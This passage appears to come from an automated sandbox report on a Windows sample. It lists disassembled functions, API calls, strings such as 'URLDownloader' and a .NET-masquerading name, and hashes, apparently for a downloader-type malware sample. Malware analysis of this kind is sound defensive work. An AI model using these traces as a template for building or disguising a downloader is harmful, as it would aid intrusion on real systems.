                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040C6B5,?,?), ref: 0040C4C9
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C512
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C534
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040C552
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040C570
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040C58E
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040C5AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5), ref: 0040C5EC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001), ref: 0040C617
                                                                                    • RegCloseKey.ADVAPI32(?,0040C69F,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales), ref: 0040C692
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
                                                                                    • Instruction ID: b87a276e91c0abd92e6ddb5251d81d319347be4625686c9aa575414df8f97b10
                                                                                    • Opcode Fuzzy Hash: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
                                                                                    • Instruction Fuzzy Hash: B251F575A50208FEDB20EB95CC82FAE77ECDB08704F5045BBB604F62C1D6789A449B5D
                                                                                    Function 004221FC Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 132libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: 2$2$2$3$3$_$e$r$s$s$u$w
                                                                                    • API String ID: 1029625771-3744707172
                                                                                    • Opcode ID: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
                                                                                    • Instruction ID: 27e9f1c01ee5c9c2bc4191f5b7c330e1c9f60075257b6c3fc99aa86c3d286dbd
                                                                                    • Opcode Fuzzy Hash: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
                                                                                    • Instruction Fuzzy Hash: AA518BB5E10248AFDB00DFA1D9819BE7F71AB45304F50809DE9481F342E6B99B16CBA1
                                                                                    Function 10001660 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 179windowregistrythreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 10001682
                                                                                      • Part of subcall function 10001430: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                      • Part of subcall function 10001430: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                      • Part of subcall function 10001430: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                    • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 10001798
                                                                                    • RegisterClassW.USER32(?), ref: 100017F7
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 100017FF
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 10001812
                                                                                    • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 1000185E
                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,10017426), ref: 1000186D
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001894
                                                                                    • TranslateMessage.USER32(?), ref: 100018A2
                                                                                    • DispatchMessageW.USER32(?), ref: 100018AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageMetricsSystemWindow$CallbackClassDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslateUserwcstombs
                                                                                    • String ID: URLDownloader$wpsv.5.6.3.exe
                                                                                    • API String ID: 73900685-244475150
                                                                                    • Opcode ID: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
                                                                                    • Instruction ID: 8631f2352c9d4e8355fdf3fc5455be072e9b283b4b7067b2d869b395449685d5
                                                                                    • Opcode Fuzzy Hash: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
                                                                                    • Instruction Fuzzy Hash: 807110B5D00218EFEB54CFA4CC45FDEBBB4EB48700F108169E619A7295EB74AA44CF51
                                                                                    Function 100018D0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 87windowthreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InitCommonControlsEx.COMCTL32(00000008), ref: 10001903
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1000190D
                                                                                    • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001933
                                                                                    • SetWindowTheme.UXTHEME(00020400,10018438,10018434), ref: 1000194E
                                                                                    • SendMessageW.USER32(00020400,00000409,00000000,00D77800), ref: 10001967
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001978
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000019F0,?,00000000,00000000), ref: 100019B9
                                                                                    • PostQuitMessage.USER32(00000000), ref: 100019C4
                                                                                    • DefWindowProcW.USER32(00000002,?,?,?), ref: 100019DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                    • String ID: $msctls_progress32$3Ro
                                                                                    • API String ID: 1181878002-754273676
                                                                                    • Opcode ID: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                    • Instruction ID: 07dac4f513f804ff03a6516b31f22f63e0bdfab53d31000085bea38267b703f6
                                                                                    • Opcode Fuzzy Hash: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                    • Instruction Fuzzy Hash: 03310675A40218FFF750CF94CC9AFAA77B4FB48701F208118FA05AA290C770DA00CB65
                                                                                    Function 10015820 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 357filesynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                      • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                    • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                    • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                    • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                    • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10015D73
                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWaitmemset
                                                                                    • String ID: %s\%s$open
                                                                                    • API String ID: 1843445691-538903891
                                                                                    • Opcode ID: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                    • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                    • Opcode Fuzzy Hash: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                    • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62
                                                                                    Function 0040C15C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000,00000000), ref: 0040C17A
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C19E
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C1AD
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C1BF
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C21C
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C245
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-GB,en,en-US,
                                                                                    • API String ID: 975949045-3021119265
                                                                                    • Opcode ID: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction ID: 62fecbf31074def960baab5c845f0e3528801b11b7ae68e71bde5ae064a172bd
                                                                                    • Opcode Fuzzy Hash: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction Fuzzy Hash: EC2196A0750701BADB207BBA8C8365925999B85B09F50457FF041BB7C2DE7C9D4182AF
                                                                                    Function 10015DF0 Relevance: 12.0, APIs: 8, Instructions: 41synchronizationthreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                    • GetLastError.KERNEL32 ref: 10015E13
                                                                                    • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                    • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                    • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                    • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 10015E58
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 355449500-0
                                                                                    • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
                                                                                    • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25
                                                                                    Function 1000281E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68sleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1133 1000281e-1000282b 1135 10002831-10002847 call 10001da0 1133->1135 1136 10002926-1000293f exit 1133->1136 1139 10002915-10002920 Sleep 1135->1139 1140 1000284d-10002865 call 10001e30 1135->1140 1139->1136 1143 10002870-10002874 1140->1143 1144 10002913 1143->1144 1145 1000287a-100028cd Sleep call 10002b60 call 10002da0 call 10001fa0 call 10002cb0 1143->1145 1144->1136 1154 1000290e 1145->1154 1155 100028cf-1000290c call 100029f0 call 10001f10 call 10002960 1145->1155 1154->1143 1155->1144
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                      • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                      • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep$CreateInitSnapshotToolhelp32Variantexit
                                                                                    • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$wpsv.5.6.3.exe
                                                                                    • API String ID: 4205734914-2781284179
                                                                                    • Opcode ID: 4bc7c9451939abfa0745cb850ad1dcc3da066166c1ff9d2bdedd87da215de9cc
                                                                                    • Instruction ID: 01e91d36be03056c32c976757ddfbd5278b963073b9274932eac54e5bb7bc252
                                                                                    • Opcode Fuzzy Hash: 4bc7c9451939abfa0745cb850ad1dcc3da066166c1ff9d2bdedd87da215de9cc
                                                                                    • Instruction Fuzzy Hash: C321ACB4C01218EBEB14CFA0DC99BEEB770FF45391F504298F4052A28ADB34AB44CB51
                                                                                    Function 10015FE6 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1163 10015fe6-10015fe9 1164 10015ff8-10016003 malloc 1163->1164 1165 10016005-10016006 1164->1165 1166 10015feb-10015ff6 _callnewh 1164->1166 1166->1164 1167 10016007-1001600b 1166->1167 1168 10016011-10016703 call 100166cf _CxxThrowException 1167->1168 1169 10016704-10016720 call 10001240 _CxxThrowException 1167->1169 1168->1169
                                                                                    APIs
                                                                                    • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                    • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                    • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                    • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                    • String ID:
                                                                                    • API String ID: 1722040371-0
                                                                                    • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                    • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                    • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                    • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
                                                                                    Function 10012F80 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                    • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 2185338108-0
                                                                                    • Opcode ID: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                    • Instruction ID: 106bc35cbdd57d80b480a718a0c65df66589e39bca71049decacc3f2370ba628
                                                                                    • Opcode Fuzzy Hash: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                    • Instruction Fuzzy Hash: AB313CB4A0021ADFDB04CF98CD91BAEB7B5FF48704F108658E916AB391C771AA41CB91
                                                                                    Function 10001430 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                    • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTaskwcstombs
